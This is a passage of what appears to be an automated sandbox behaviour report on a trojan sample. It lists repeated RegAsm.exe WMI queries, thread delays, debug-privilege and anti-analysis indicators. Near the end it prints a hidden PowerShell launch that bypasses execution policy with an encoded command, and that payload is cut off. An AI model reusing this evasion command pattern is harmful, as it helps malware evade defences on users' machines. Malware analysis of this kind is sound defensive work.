                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject4.56087.24588.10142.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\XsdType\Target.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeThread delayed: delay time: 60000Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeThread delayed: delay time: 59859Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeThread delayed: delay time: 59733Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeThread delayed: delay time: 59624Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeThread delayed: delay time: 59515Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeThread delayed: delay time: 59404Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeThread delayed: delay time: 180000Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeThread delayed: delay time: 59871Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeThread delayed: delay time: 59750Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeThread delayed: delay time: 59641Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeThread delayed: delay time: 59516Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeThread delayed: delay time: 59405Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeThread delayed: delay time: 59297Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeThread delayed: delay time: 1199187Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeThread delayed: delay time: 59856Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeThread delayed: delay time: 1198318Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeThread delayed: delay time: 59735Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeThread delayed: delay time: 59610Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeThread delayed: delay time: 59485Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeThread delayed: delay time: 59373Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeThread delayed: delay time: 59852Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeThread delayed: delay time: 59731Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeThread delayed: delay time: 59374Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeThread delayed: delay time: 59874Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeThread delayed: delay time: 59745Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeThread delayed: delay time: 59625Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeThread delayed: delay time: 59406Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeThread delayed: delay time: 59872Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeThread delayed: delay time: 59755Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeThread delayed: delay time: 59626Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeThread delayed: delay time: 59514Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeThread delayed: delay time: 59392Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeThread delayed: delay time: 59267Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\XsdType\Target.exeThread delayed: delay time: 922337203685477
                      Source: RegAsm.exe, 00000004.00000002.4136529303.000001DC5C7B0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeCode function: 4_2_00007FFD9BA198D5 rdtsc 4_2_00007FFD9BA198D5
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject4.56087.24588.10142.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Users\user\AppData\Roaming\XsdType\Target.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject4.56087.24588.10142.exeMemory allocated: page read and write | page guardJump to behavior

                      HIPS / PFW / Operating System Protection Evasion

                      barindex
                      Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc 